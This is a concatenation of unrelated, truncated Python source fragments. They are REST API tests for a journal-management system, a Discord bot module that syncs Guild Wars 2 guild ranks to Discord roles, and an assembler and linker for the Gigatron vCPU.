response['succeeding_title'], None)
def test_api_pub_status_data(self):
col = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ).json
self.assertEqual(response['pub_status'], {col.name:
journal.membership_info(collection=col, attribute='status')})
def test_api_pub_status_data_with_multiple_collection(self):
col1 = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col1, self.user)
journal.join(col2, self.user)
#Change status of journal on collection 1
journal.change_status(col1, 'current',
'The journal passed on SciELO evaluation', self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ).json
self.assertEqual(response['pub_status'],
{col.name:journal.membership_info(collection=col, attribute='status')
for col in journal.collections.all()})
def test_api_pub_status_history_data(self):
col1 = modelfactories.CollectionFactory()
col2 = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(col1, self.user)
journal.join(col2, self.user)
response = self.app.get('/api/v2/journals/%s/' % journal.pk,
extra_environ=self.extra_environ).json
expected_history = []
for history in journal.statuses.order_by('-since').all():
expected_history.append({'date': history.since.strftime('%Y-%m-%dT%H:%M:%S.%f'), 'status': history.status})
self.assertEqual(response['pub_status_history'],
expected_history)
class CollectionRestAPITest(WebTest):
def setUp(self):
self.user = auth.UserF(is_active=True)
self.extra_environ = _make_auth_environ(self.user.username,
self.user.api_key.key)
def test_index(self):
modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/',
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_post_data(self):
response = self.app.post('/api/v2/collections/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data(self):
response = self.app.put('/api/v2/collections/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data(self):
response = self.app.delete('/api/v2/collections/',
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('name' in response.content)
def test_post_data_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.post('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.put('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_getone(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.delete('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_api_v2_datamodel(self):
collection = modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/%s/' % collection.pk,
extra_environ=self.extra_environ)
expected_keys = [
u'city',
u'fax',
u'address_complement',
u'address_number',
u'acronym',
u'country',
u'zip_code',
u'id',
u'phone',
u'state',
u'name_slug',
u'url',
u'address',
u'logo',
u'resource_uri',
u'email',
u'name'
]
self.assertEqual(response.json.keys(), expected_keys)
def test_access_denied_for_unauthorized_users(self):
modelfactories.CollectionFactory.create()
response = self.app.get('/api/v2/collections/', status=401)
self.assertEqual(response.status_code, 401)
class IssuesRestAPITest(WebTest):
def setUp(self):
self.user = auth.UserF(is_active=True)
self.extra_environ = _make_auth_environ(self.user.username, self.user.api_key.key)
def test_issue_index(self):
modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/', extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_issue_filters(self):
resource_filters = IssueResource().Meta
mandatory_filters = ['journal', 'is_marked_up']
for fltr in mandatory_filters:
self.assertTrue(fltr in resource_filters.filtering)
def test_post_data(self):
modelfactories.IssueFactory.create()
response = self.app.post('/api/v2/issues/', extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data(self):
modelfactories.IssueFactory.create()
response = self.app.put('/api/v2/issues/', extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data(self):
modelfactories.IssueFactory.create()
response = self.app.delete('/api/v2/issues/', extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_issue_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('number' in response.content)
def test_post_data_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.post('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_put_data_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.put('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_del_data_getone(self):
issue = modelfactories.IssueFactory.create()
response = self.app.delete('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ, status=405)
self.assertEqual(response.status_code, 405)
def test_api_v2_datamodel(self):
issue = modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
expected_keys = [
u'ctrl_vocabulary',
u'number',
u'total_documents',
u'label',
u'id',
u'publication_start_month',
u'suppl_number',
u'publication_end_month',
u'editorial_standard',
u'sections',
u'spe_text',
u'updated',
u'suppl_volume',
u'journal',
u'volume',
u'is_trashed',
u'is_marked_up',
u'created',
u'cover',
u'publication_year',
u'order',
u'resource_uri',
u'thematic_titles',
u'suppl_text',
u'type',
u'use_license'
]
self.assertEqual(sorted(response.json.keys()), sorted(expected_keys))
def test_access_denied_for_unauthenticated_users(self):
modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/', status=401)
self.assertEqual(response.status_code, 401)
def test_thematic_titles_must_be_dict(self):
issue = modelfactories.IssueFactory.create()
modelfactories.IssueTitleFactory.create(issue=issue)
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(content.get('thematic_titles', None), {'pt': 'Bla'})
def test_thematic_titles_must_be_dict_even_if_empty(self):
issue = modelfactories.IssueFactory.create()
response = self.app.get('/api/v2/issues/%s/' % issue.pk, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertIsInstance(content.get('thematic_titles', None), dict)
def test_list_all_by_collection(self):
collection = modelfactories.CollectionFactory()
journal = modelfactories.JournalFactory.create()
journal.join(collection, self.user)
modelfactories.IssueFactory.create(journal=journal)
collection_name = collection.name
response = self.app.get('/api/v2/issues/?collection=%s' % collection_name, extra_environ=self.extra_environ)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
def test_suppl_number_filter_without_volume(self):
"""
Create a supplement issue with ``number`` and ``suppl_text`` set and an empty ``volume`` field,
then request the API with the ``suppl_number`` filter. It should return that issue with the
correct ``suppl_number`` (= ``suppl_text``) and an empty ``suppl_volume``.
"""
issue = modelfactories.IssueFactory.create(number='999', suppl_text='2', volume='', type='supplement')
response = self.app.get('/api/v2/issues/?suppl_number=%s' % issue.number, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
content = content['objects'][0]
self.assertEqual(content.get('suppl_number', None), issue.suppl_text)
self.assertEqual(content.get('suppl_volume', None), '')
self.assertEqual(content.get('number', None), issue.number)
self.assertEqual(content.get('volume', None), issue.volume)
def test_suppl_number_filter_with_volume(self):
"""
Create a supplement issue with ``number``, ``suppl_text`` and a *non*-empty ``volume`` field,
then request the API with the ``suppl_number`` filter. It should return that issue with the
correct ``suppl_number`` (= ``suppl_text``) and ``suppl_volume`` (= ``suppl_text``).
"""
issue = modelfactories.IssueFactory.create(number='999', suppl_text='2', volume='1', type='supplement')
response = self.app.get('/api/v2/issues/?suppl_number=%s' % issue.number, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
self.assertEqual(len(content['objects']), 1)
content = content['objects'][0]
self.assertEqual(content.get('suppl_number', None), issue.suppl_text)
self.assertEqual(content.get('suppl_volume', None), issue.suppl_text)
self.assertEqual(content.get('number', None), issue.number)
self.assertEqual(content.get('volume', None), issue.volume)
def test_suppl_volume_filter_without_number(self):
"""
Create a supplement issue with ``volume``, ``suppl_text`` and an empty ``number`` field,
then request the API with the ``suppl_volume`` filter. It should return that issue with the
correct ``suppl_volume`` (= ``suppl_text``) and an empty ``suppl_number``.
"""
issue = modelfactories.IssueFactory.create(volume='999', suppl_text='2', number='', type='supplement')
response = self.app.get('/api/v2/issues/?suppl_volume=%s' % issue.volume, extra_environ=self.extra_environ)
content = json.loads(response.content)
self.assertEqual(response.status_code, 200)
self.assertTrue('objects' in response.content)
self.assertEqual(len(content['objects']),
<filename>guildwars2/guild/sync.py
import asyncio
import discord
from discord.ext import commands
from discord.ext.commands.cooldowns import BucketType
from ..exceptions import APIError, APIForbidden, APIKeyError, APINotFound
class SyncGuild:
@commands.guild_only()
@commands.has_permissions(administrator=True)
@commands.group(name="guildsync")
async def guildsync(self, ctx):
"""In game guild rank to discord roles synchronization commands
This grou= allows you to set up a link between your ingame roster and discord.
When enabled, new roles will be created for each of your ingame ranks,
and ingame members are periodically synced to have the
correct role in discord."""
if ctx.invoked_subcommand is None:
await self.bot.send_cmd_help(ctx)
async def clearsync(self, ctx):
doc = await self.bot.database.get_guild(ctx.guild, self)
ranks = doc["sync"].get("ranks")
for rank in ranks:
roleobject = discord.utils.get(ctx.guild.roles, id=ranks[rank])
try:
await roleobject.delete()
except discord.Forbidden:
await ctx.send(
"Don't have permission to delete {0}".format(rank))
except AttributeError:
# role doesn't exist anymore?
pass
await self.bot.database.set_guild(ctx.guild, {
"sync.ranks": {},
"sync.leader": None,
"sync.setupdone": False,
"sync.on": False,
"sync.guildrole": False,
"sync.name": None,
"sync.gid": None
}, self)
@guildsync.command(name="clear")
async def sync_clear(self, ctx):
"""Wipes settings and created roles and turns sync off."""
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if not enabled:
return await ctx.send("No settings to clear.")
await self.clearsync(ctx)
await ctx.send("Your settings have been wiped, created roles deleted"
" and sync disabled.")
@guildsync.command(name="setup")
async def sync_setup(self, ctx):
"""Setup process for ingame ranks to discord member roles sync"""
def check(m):
return m.author == ctx.author and m.channel == ctx.channel
if not ctx.guild.me.guild_permissions.manage_roles:
await ctx.send(
"I require the 'Manage Roles' permission to do this.")
return
doc = await self.bot.database.get_guild(ctx.guild, self)
if not doc:
await self.bot.database.set_guild(
ctx.guild, {"sync.on": False,
"sync.setupdone": False}, self)
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if enabled:
message = await ctx.send(
"You have already ran setup on this guild before, continuing "
"will reset existing settings and delete previously "
"created roles, reply Yes to confirm.")
try:
answer = await self.bot.wait_for(
"message", timeout=30, check=check)
except asyncio.TimeoutError:
return await message.edit(content="No response in time")
if answer.content.lower() != "yes":
return
else:
await self.clearsync(ctx)
message = await ctx.send(
"Please type the name of the in-game guild you want to sync "
"to into the chat now. Please ensure you respond with it "
"exactly as it is in-game.")
try:
answer = await self.bot.wait_for(
"message", timeout=30, check=check)
except asyncio.TimeoutError:
return await message.edit(content="No response in time")
scopes = ["guilds"]
endpoint_id = "guild/search?name=" + answer.content.replace(' ', '%20')
try:
guild_id = await self.call_api(endpoint_id)
guild_id = guild_id[0]
endpoints = [
"guild/{}/members".format(guild_id),
"guild/{}/ranks".format(guild_id), "guild/{}".format(guild_id)
]
results, ranks, info = await self.call_multiple(
endpoints, ctx.author, scopes)
except (IndexError, APINotFound):
return await ctx.send("Invalid guild name")
except APIForbidden:
return await ctx.send(
"You need to have guild leader permissions ingame to be able "
"to use this synchronization.")
except APIKeyError:
return await ctx.send(
"You need to add an API key to your account first.")
except APIError as e:
return await self.error_handler(ctx, e)
roles = {}
for rank in ranks:
try:
role = await ctx.guild.create_role(
name=rank["id"],
reason="GW2Bot Sync Role [$guildsync]",
color=discord.Color(self.embed_color))
roles[rank["id"]] = role.id
except discord.Forbidden:
return await ctx.send(
"Couldn't create role {0}".format(rank["name"]))
await self.bot.database.set_guild(ctx.guild, {
"sync.ranks":
roles,
"sync.leader":
ctx.author.id,
"sync.setupdone":
True,
"sync.on":
True,
"sync.guildrole":
False,
"sync.name":
"[{0}]".format(info['tag']),
"sync.gid":
guild_id
}, self)
guidelines = (
"Guild sync requires leader permissions in game\n"
"Guild sync is tied to your account. If you remove your API key, "
"guild sync will break\n"
"**Always ensure that GW2Bot is above the synced roles, or the "
"bot won't be able to assign them**\n"
"You can modify and change permissions of the roles created by "
"the bot.\n"
"Only server members with API key added to the bot will "
"participate in the sync, and no input is required from them. "
"New members which add their API key after sync is "
"setup will also be synced automatically.\n"
"Guild sync isn't instant - it can take even 30 minutes before "
"your settings are synced. To force a sync, you can use "
"**guildsync now**\n")
await ctx.send(
"Setup complete, you can toggle the synchronization on and off "
"at any time with $guildsync toggle on/off. Now, some guidelines. "
"In case of issues, refer to this message - you can also find it "
"on the website https://gw2bot.info under FAQ")
await ctx.send(guidelines)
doc = await self.bot.database.get_guild(ctx.guild)
await self.sync_guild_ranks(doc, True)
@guildsync.command(name="toggle")
async def sync_toggle(self, ctx, on_off: bool):
"""Toggles synchronization on/off - does not wipe settings"""
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if not enabled:
await ctx.send(
"You need to run setup before you can toggle synchronization")
return
await self.bot.database.set_guild(ctx.guild, {"sync.on": on_off}, self)
if on_off:
msg = ("Synchronization enabled.")
else:
msg = ("Synchronization disabled.")
await ctx.send(msg)
@guildsync.command(name="guildrole")
async def guildrole_toggle(self, ctx, on_off: bool):
"""Adds a new role based on the guild tag for channel management."""
doc = await self.bot.database.get_guild(ctx.guild, self)
guilddoc = doc["sync"]
guild = self.bot.get_guild(doc["_id"])
enabled = self.sync_enabled(doc)
if not enabled:
await ctx.send(
"You need to run setup before you can toggle the guild role.")
return
# Find and create name if key doesn't exist.
if "name" not in guilddoc:
info = await self.call_api("guild/{0}".format(guilddoc["gid"]))
guilddoc["name"] = "[{0}]".format(info['tag'])
await self.bot.database.set_guild(
guild, {"sync.name": guilddoc["name"]}, self)
await self.bot.database.set_guild(ctx.guild,
{"sync.guildrole": on_off}, self)
if on_off:
# Create role if not enabled already.
if not guilddoc["guildrole"]:
try:
role = await ctx.guild.create_role(
name=guilddoc["name"],
reason="GW2Bot Sync Role [$guildsync]",
color=discord.Color(self.embed_color))
guilddoc["ranks"][guilddoc["name"]] = role.id
except discord.Forbidden:
return await ctx.send(
"Couldn't create role {0}".format(guilddoc["name"]))
await self.bot.database.set_guild(
guild, {"sync.ranks": guilddoc["ranks"]}, self)
msg = ("Guild role enabled and created. Guild sync needs to "
"run for members to be synced to the role.")
else:
# Force sync
doc = await self.bot.database.get_guild(ctx.guild)
await self.sync_guild_ranks(doc)
msg = ("Guild role disabled and cleared.")
await ctx.send(msg)
@guildsync.command(name="now")
@commands.cooldown(1, 60, BucketType.user)
async def sync_now(self, ctx):
"""Force a synchronization, also deletes or creates new ranks as needed."""
doc = await self.bot.database.get_guild(ctx.guild, self)
enabled = self.sync_enabled(doc)
if not enabled:
return await ctx.send(
"You need to run setup before you can synchronize.")
await ctx.trigger_typing()
doc = await self.bot.database.get_guild(ctx.guild)
await self.sync_guild_ranks(doc)
await ctx.send("Done.")
async def getmembers(self, leader, guild_id):
scopes = ["guilds"]
try:
endpoint = "guild/{}/members".format(guild_id)
results = await self.call_api(endpoint, leader, scopes)
return results
except Exception as e:
return None
async def add_member_to_role(self, role, member, guild):
try:
await member.add_roles(
role, reason="GW2Bot Integration [$guildsync]")
except discord.Forbidden:
self.log.debug("Permissions error when trying to "
"give {0} role to {1} user "
"in {2} server.".format(role.name, member.name,
guild.name))
return None
except AttributeError:
# role no longer exists - deleted?
return None
async def sync_guild_ranks(self, doc, initial=False):
name = self.__class__.__name__
guilddoc = doc["cogs"][name]["sync"]
enabled = guilddoc.get("on", False)
guildrole = guilddoc["name"] if guilddoc.get("guildrole",
False) else None
if not enabled:
return
guild = self.bot.get_guild(doc["_id"])
if guild is None:
return
savedranks = guilddoc["ranks"]
gid = guilddoc["gid"]
endpoint = "guild/{0}/ranks".format(gid)
lid = guilddoc["leader"]
scopes = ["guilds"]
leader = await self.bot.get_user_info(lid)
currentranks = []
existingranks = []
newranks = []
newsaved = {}
if not initial:
if len(guild.roles) <= 1:
return
try:
ranks = await self.call_api(endpoint, leader, scopes)
except APIError:
return
# Add guildrole to allowed ranks
if guildrole:
ranks.append({'id': guildrole})
for rank in ranks:
try:
discordrole = discord.utils.get(
guild.roles, id=guilddoc["ranks"][rank["id"]])
if discordrole:
existingranks.append(discordrole)
newsaved[rank["id"]] = discordrole.id
else:
newranks.append(rank["id"])
except KeyError:
newranks.append(rank["id"])
for role_id in savedranks.values():
discordrole = discord.utils.get(guild.roles, id=role_id)
currentranks.append(discordrole)
todelete = set(currentranks) - set(existingranks)
for rank in todelete:
try:
await rank.delete()
except discord.Forbidden:
pass
except AttributeError:
pass
for role in newranks:
newrole = await guild.create_role(
name=role,
reason="GW2Bot Sync Role [$guildsync]",
color=discord.Color(self.embed_color))
newsaved[role] = newrole.id
guilddoc["ranks"] = newsaved
await self.bot.database.set_guild(guild, {"sync.ranks": newsaved},
self)
gw2members = await self.getmembers(leader, gid)
rolelist = []
if guildrole:
guildrole = discord.utils.get(
guild.roles, id=guilddoc["ranks"][guildrole])
for role_id in newsaved.values():
discordrole = discord.utils.get(guild.roles, id=role_id)
rolelist.append(discordrole)
if gw2members is not None:
for member in guild.members:
rank = None
try:
keydoc = await self.fetch_key(member)
name = keydoc["account_name"]
for gw2user in gw2members:
if gw2user["name"] == name:
rank = gw2user["rank"]
if rank:
try:
desiredrole = discord.utils.get(
guild.roles, id=guilddoc["ranks"][rank])
if desiredrole not in member.roles:
for role in rolelist:
try:
await member.remove_roles(
role,
reason=
"GW2Bot Integration [$guildsync]")
except discord.Forbidden:
self.log.debug(
"Permissions error when trying to "
"remove {0} role from {1} "
| |
from copy import copy
from re import findall
import sys
global_labels = {
'vPC': 0x0016,
'vAC': 0x0018,
'vACH': 0x0019,
'vLR': 0x001a,
'vLRH': 0x001b,
'sysFn': 0x0022,
'r1': 0x0030,
'r2': 0x0032,
'r3': 0x0034,
'r4': 0x0036,
'r5': 0x0038,
'r6': 0x003a,
'r7': 0x003c,
'r8': 0x003e,
'r9': 0x0040,
'r10': 0x0042,
'r11': 0x0044,
'r12': 0x0046,
'r13': 0x0048,
'r14': 0x004a,
'r15': 0x004c,
'SYS_LSRW1_48' : 0x0600,
}
class Log:
def __init__(self, f):
self.f = f
log = Log(sys.stderr)
class Segment:
def __init__(self, address, size):
self.address = address
self.size = size
self.buffer = bytearray()
self.relocs = {}
def pc(self):
return self.address + len(self.buffer)
def remaining(self):
return self.size - len(self.buffer)
def emit(self, data):
assert(len(self.buffer) + len(data) <= self.size)
self.buffer += data
def emitb(self, opcode, operand):
assert(operand >= -128 and operand < 256)
self.emit(bytes([opcode, operand]))
def emitw(self, opcode, operand):
assert(operand >= -32768 and operand < 65536)
self.emit(bytes([opcode, operand & 0xff, (operand >> 8) & 0xff]))
def reloc(self, addr, symbol):
assert(addr >= self.address and addr < self.address + self.size)
self.relocs[addr - self.address] = symbol
def write(self, stream):
if len(self.buffer) != 0:
print(f'writing segment {self.address:x}:{self.pc():x}', file=log.f)
stream.write(bytes([self.address >> 8 & 0xff, self.address & 0xff, len(self.buffer) & 0xff]))
stream.write(self.buffer)
def prev(address, step=2):
"""Subtract 2 while staying in the same page
This is needed for target calculations because vCPU always
increments [vPC] by 2 *before* fetching the next opcode."""
return (address & 0xff00) | ((address - step) & 0x00ff)
class Inst:
def __init__(self, opcode, operand, size, branch, emit):
self.addr = None
self.opcode = opcode
self.operand = operand
self.size = size
self.branch = branch
self._emit = emit
def emit(self, segment):
self._emit(self, segment)
def emitjcc(self, segment, near, far):
# 'near' is the condition code for local branches, 'far' is its inverse condition
if self.operand & 0xff00 != self.addr & 0xff00:
# far jump
assert(self.size == 8)
print(f'emitting far branch from {self.addr:x} to {self.operand:x}', file=log.f)
skip = prev(self.addr, step=2 - 8)
segment.emit(bytes([0x35, far, skip & 0xff])) # BCC <far> <skip>
segment.emitw(0x11, prev(self.operand)) # LDWI <target>
segment.emitb(0xf3, global_labels['pvpc']) # DOKE pvpc
else:
# near jump
assert(self.size == 3)
print(f'emitting near branch from {self.addr:x} to {self.operand:x}', file=log.f)
segment.emit(bytes([0x35, near, prev(self.operand) & 0xff]))# BCC <near> <target>
def emitj(self, segment):
if self.operand & 0xff00 == self.addr & 0xff00:
print(f'emitting near jump from {self.addr:x} to {self.operand:x}', file=log.f)
segment.emitb(0x90, prev(self.operand) & 0xff) # BRA <target>
else:
print(f'emitting far jump from {self.addr:x} to {self.operand:x}', file=log.f)
Inst.ldwi(prev(self.operand)).emit(segment)
segment.emitb(0xf3, global_labels['pvpc']) # DOKE pvpc
@staticmethod
def glob(name): return Inst('glob', name, 0, False, lambda i, s: None)
@staticmethod
def label(name): return Inst('label', name, 0, False, lambda i, s: None)
@staticmethod
def ldwi(con): return Inst('ldwi', con, 3, False, lambda i, s: s.emitw(0x11, i.operand))
@staticmethod
def ld(d): return Inst('ld', d, 2, False, lambda i, s: s.emitb(0x1a, i.operand))
@staticmethod
def ldw(d): return Inst('ldw', d, 2, False, lambda i, s: s.emitb(0x21, i.operand))
@staticmethod
def stw(d): return Inst('stw', d, 2, False, lambda i, s: s.emitb(0x2b, i.operand))
@staticmethod
def ldlw(d): return Inst('ldlw', d, 2, False, lambda i, s: s.emitb(0xee, i.operand))
@staticmethod
def stlw(d): return Inst('stlw', d, 2, False, lambda i, s: s.emitb(0xec, i.operand))
@staticmethod
def alloc(d): return Inst('alloc', d, 2, False, lambda i, s: s.emitb(0xdf, i.operand))
@staticmethod
def jeq(l): return Inst('jeq', l, 8, True, lambda i, s: i.emitjcc(s, 0x3f, 0x72))
@staticmethod
def jne(l): return Inst('jne', l, 8, True, lambda i, s: i.emitjcc(s, 0x72, 0x3f))
@staticmethod
def jge(l): return Inst('jge', l, 8, True, lambda i, s: i.emitjcc(s, 0x53, 0x50))
@staticmethod
def jgt(l): return Inst('jgt', l, 8, True, lambda i, s: i.emitjcc(s, 0x4d, 0x56))
@staticmethod
def jle(l): return Inst('jle', l, 8, True, lambda i, s: i.emitjcc(s, 0x56, 0x4d))
@staticmethod
def jlt(l): return Inst('jlt', l, 8, True, lambda i, s: i.emitjcc(s, 0x50, 0x53))
@staticmethod
def ldi(con): return Inst('ldi', con, 2, False, lambda i, s: s.emitb(0x59, i.operand))
@staticmethod
def st(d): return Inst('st', d, 2, False, lambda i, s: s.emitb(0x5e, i.operand))
@staticmethod
def pop(): return Inst('pop', None, 1, False, lambda i, s: s.emit(bytes([0x63])))
@staticmethod
def popret(): return Inst('popret', None, 2, False, lambda i, s: s.emit(bytes([0x63, 0xff])))
@staticmethod
def push(): return Inst('push', None, 1, False, lambda i, s: s.emit(bytes([0x75])))
@staticmethod
def lup(d): return Inst('lup', d, 2, False, lambda i, s: s.emitb(0x7f, i.operand))
@staticmethod
def andi(con): return Inst('andi', con, 2, False, lambda i, s: s.emitb(0x82, i.operand))
@staticmethod
def ori(con): return Inst('ori', con, 2, False, lambda i, s: s.emitb(0x88, i.operand))
@staticmethod
def xori(con): return Inst('xori', con, 2, False, lambda i, s: s.emitb(0x8c, i.operand))
@staticmethod
def j(l): return Inst('j', l, 5, False, lambda i, s: i.emitj(s))
@staticmethod
def jr(): return Inst('jr', None, 2, False, lambda i, s: s.emitb(0xf3, global_labels['pvpc']))
@staticmethod
def inc(d): return Inst('inc', d, 2, False, lambda i, s: s.emitb(0x93, i.operand))
@staticmethod
def addw(d): return Inst('addw', d, 2, False, lambda i, s: s.emitb(0x99, i.operand))
@staticmethod
def peek(): return Inst('peek', None, 1, False, lambda i, s: s.emit(bytes([0xad])))
@staticmethod
def sys(con): return Inst('sys', con, 2, False, lambda i, s: s.emitb(0xb4, i.operand))
@staticmethod
def subw(d): return Inst('subw', d, 2, False, lambda i, s: s.emitb(0xb8, i.operand))
@staticmethod
def call(d): return Inst('call', d, 2, False, lambda i, s: s.emitb(0xcf, i.operand))
@staticmethod
def addi(con): return Inst('addi', con, 2, False, lambda i, s: s.emitb(0xe3, i.operand))
@staticmethod
def subi(con): return Inst('subi', con, 2, False, lambda i, s: s.emitb(0xe6, i.operand))
@staticmethod
def lslw(): return Inst('lslw', None, 1, False, lambda i, s: s.emit(bytes([0xe9])))
@staticmethod
def poke(d): return Inst('poke', d, 2, False, lambda i, s: s.emitb(0xf0, i.operand))
@staticmethod
def doke(d): return Inst('doke', d, 2, False, lambda i, s: s.emitb(0xf3, i.operand))
@staticmethod
def deek(): return Inst('deek', None, 1, False, lambda i, s: s.emit(bytes([0xf6])))
@staticmethod
def andw(d): return Inst('andw', d, 2, False, lambda i, s: s.emitb(0xf8, i.operand))
@staticmethod
def orw(d): return Inst('orw', d, 2, False, lambda i, s: s.emitb(0xfa, i.operand))
@staticmethod
def xorw(d): return Inst('xorw', d, 2, False, lambda i, s: s.emitb(0xfc, i.operand))
@staticmethod
def ret(): return Inst('ret', None, 1, False, lambda i, s: s.emit(bytes([0xff])))
@staticmethod
def db(con): return Inst('db', con, 1, False, lambda i, s: s.emit(bytes([i.operand])))
@staticmethod
def dw(con): return Inst('dw', con, 2, False, lambda i, s: s.emit(bytes([i.operand & 0xff, (i.operand >> 8) & 0xff])))
@staticmethod
def dx(x): return Inst('dx', x, len(x), False, lambda i, s: s.emit(bytes(x)))
@staticmethod
def dc(l): return Inst('dc', l, 2, False, lambda i, s: s.emit(bytes([prev(i.operand) & 0xff, prev(i.operand) >> 8])))
@staticmethod
def dl(l): return Inst('dl', l, sum([i.size for i in l]), False, None)
functions = {}
func = None
def defun(name):
global func
func = []
functions[name] = func
def glob(name): func.append(Inst.glob(name))
def label(name): func.append(Inst.label(name))
def ldwi(con): func.append(Inst.ldwi(con))
def ld(d): func.append(Inst.ld(d))
def ldw(d): func.append(Inst.ldw(d))
def stw(d): func.append(Inst.stw(d))
def ldlw(d): func.append(Inst.ldlw(d))
def stlw(d): func.append(Inst.stlw(d))
def alloc(d): func.append(Inst.alloc(d))
def jeq(l): func.append(Inst.jeq(l))
def jne(l): func.append(Inst.jne(l))
def jge(l): func.append(Inst.jge(l))
def jgt(l): func.append(Inst.jgt(l))
def jle(l): func.append(Inst.jle(l))
def jlt(l): func.append(Inst.jlt(l))
def ldi(con): func.append(Inst.ldi(con))
def st(d): func.append(Inst.st(d))
def pop(): func.append(Inst.pop())
def popret(): func.append(Inst.popret())
def push(): func.append(Inst.push())
def lup(d): func.append(Inst.lup(d))
def andi(con): func.append(Inst.andi(con))
def ori(con): func.append(Inst.ori(con))
def xori(con): func.append(Inst.xori(con))
def j(l): func.append(Inst.j(l))
def jr():
# Check for a preceding ldwi. If one exists, snip it out and create a 'j' instead of a 'jr'.
if len(func) > 0 and func[len(func)-1].opcode == 'ldwi':
func[len(func)-1] = Inst.j(func[len(func)-1].operand)
else:
func.append(Inst.jr())
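# Hedged note (not in the original source): the peephole above turns the pair
#   ldwi('target'); jr()
# into the single pseudo-instruction Inst.j('target'), so emitj() can later pick
# the short BRA form when 'target' resolves to the same page as the jump itself.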
def inc(d): func.append(Inst.inc(d))
def addw(d): func.append(Inst.addw(d))
def peek(): func.append(Inst.peek())
def sys(con): func.append(Inst.sys(con))
def subw(d): func.append(Inst.subw(d))
def call(d): func.append(Inst.call(d))
def addi(con): func.append(Inst.addi(con))
def subi(con): func.append(Inst.subi(con))
def lslw(): func.append(Inst.lslw())
def poke(d): func.append(Inst.poke(d))
def doke(d): func.append(Inst.doke(d))
def deek(): func.append(Inst.deek())
def andw(d): func.append(Inst.andw(d))
def orw(d): func.append(Inst.orw(d))
def xorw(d): func.append(Inst.xorw(d))
def ret(): func.append(Inst.ret())
def db(con): func.append(Inst.db(con))
def dw(con): func.append(Inst.dw(con))
def dx(x): func.append(Inst.dx(x))
def dc(l): func.append(Inst.dc(l))
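# Hedged usage sketch (the function and label names here are made up, not taken
# from the original program): the module-level wrappers above accumulate
# instructions into the current function started by defun(), e.g.
#
#   defun('@zero_r13')
#   label('zero_r13')
#   ldi(0)           # vAC := 0
#   stw(0x48)        # store vAC to r13 (0x0048 in the table above)
#   ret()
#
# link() later garbage-collects, lays out and emits whatever defun() registered.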
def link(entry, outf, logf):
log.f = logf
# Before laying out any functions, garbage collect those that are not used.
marked = {'@globals', '@thunk0', '@thunk1', '@thunk2', entry}
for name, func in functions.items():
if name == '@globals':
continue
labels = set()
for inst in func:
if inst.opcode == 'label' or inst.opcode == 'glob':
labels.add(inst.operand)
elif type(inst.operand) is str and inst.operand not in labels:
marked.add(inst.operand)
for name in list(functions.keys()):
if name[0] == '@':
if name not in marked and name[1:] not in marked:
print(f'removing function {name}', file=log.f)
functions[name] = []
elif name not in marked:
print(f'removing function {name}', file=log.f)
del functions[name]
# After garbage collection, coalesce adjacent data instructions into contiguous lists. This is necessary in
# order to avoid arrays being split across segment discontinuities.
for name, func in functions.items():
result = []
coalesced = None
for inst in func:
if inst.opcode in { 'db', 'dw', 'dx', 'dc' }:
if coalesced is None:
coalesced | |
import json
import os
import xml.etree.ElementTree as ET
import numpy as np
